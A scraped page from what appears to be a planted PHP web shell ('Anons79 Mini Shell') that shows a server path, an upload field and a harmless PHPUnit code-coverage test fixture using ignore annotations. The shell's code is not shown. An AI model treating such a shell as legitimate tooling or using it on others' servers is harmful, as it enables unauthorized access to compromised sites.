Anons79 Mini Shell

Directory : /home/proudlyafrican/www/vendor/phpunit/php-code-coverage/tests/_files/
Upload File :
Current File : //home/proudlyafrican/www/vendor/phpunit/php-code-coverage/tests/_files/source_with_ignore.php

<?php
if ($neverHappens) {
    // @codeCoverageIgnoreStart
    print '*';
    // @codeCoverageIgnoreEnd
}

/**
 * @codeCoverageIgnore
 */
class Foo
{
    public function bar()
    {
    }
}

class Bar
{
    /**
     * @codeCoverageIgnore
     */
    public function foo()
    {
    }
}

function baz()
{
    print '*'; // @codeCoverageIgnore
}

interface Bor
{
    public function foo();

}

Anons79 File Manager Version 1.0, Coded By Anons79
Email: [email protected]